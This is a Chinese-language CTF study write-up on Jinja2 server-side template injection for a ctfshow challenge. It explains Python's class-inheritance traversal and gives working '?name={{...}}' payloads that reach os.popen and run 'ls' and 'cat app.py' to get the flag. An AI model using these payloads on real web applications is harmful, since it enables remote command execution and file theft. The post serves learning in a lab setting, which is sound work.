CTF模板注入入门学习

对于知识框架的了解，站在巨人的肩膀梭哈大佬文章，很全很nice：

https://blog.csdn.net/LYJ20010728/article/details/120205725?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165811033516781647533366%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165811033516781647533366&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-4-120205725-null-null.142%5Ev32%5Enew_blog_pos_by_title,185%5Ev2%5Econtrol&utm_term=SSTI%20%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4187

https://xz.aliyun.com/t/3679#toc-8

先大概过了遍，知道ssti是啥东西了，还是迷迷糊糊的，打算直接上手题目分析吧，在实践中学习。

ctfshow ssti

题目一：

盲猜name为注入点，直接打上测试表达式，执行成功存在注入点。

Python 中一切均为对象，均继承于 object 对象，Python 的 object 类中集成了很多的基础函数，假如需要在 Payload 中使用某个函数就需要用 object 去操作

常见的继承关系的方法有以下三种:
    base：对象的一个基类，一般情况下是 object
    mro：获取对象的基类，只是这时会显示出整个继承链的关系，是一个列表，object 在最底层所以在列表中的最后，通过 mro[-1] 可以获取到
    subclasses()：继承此对象的子类，返回一个列表

• __init__
  所有自带类都包含init方法。是服务下面这个函数的

• __globals__
function.__globals__，用于获取function所处空间下可使用的module、方法以及所有变量。

整体攻击思路为：变量 -> 对象 -> 基类 -> 子类遍历 -> 全局变量
具体来说：变量是name

• 随便找一个内置类对象用__class__拿到他所对应的类
• 用__bases__拿到基类（<class 'object'>）
• 用__subclasses__()拿到子类列表
• 在子类列表中直接寻找可以利用的类getshell

''.__class__.__bases__[0].__subclasses__()
().__class__.__mro__[2].__subclasses__()
request.__class__.__mro__[1]
''.__class__.__mro__[-1].__subclasses__()

都可以对object对象进行子类的遍历，os._wrap_close类里有popen,我们可以拿来进行命令执行

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

 ?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat app.py').read()}}

 拿到flag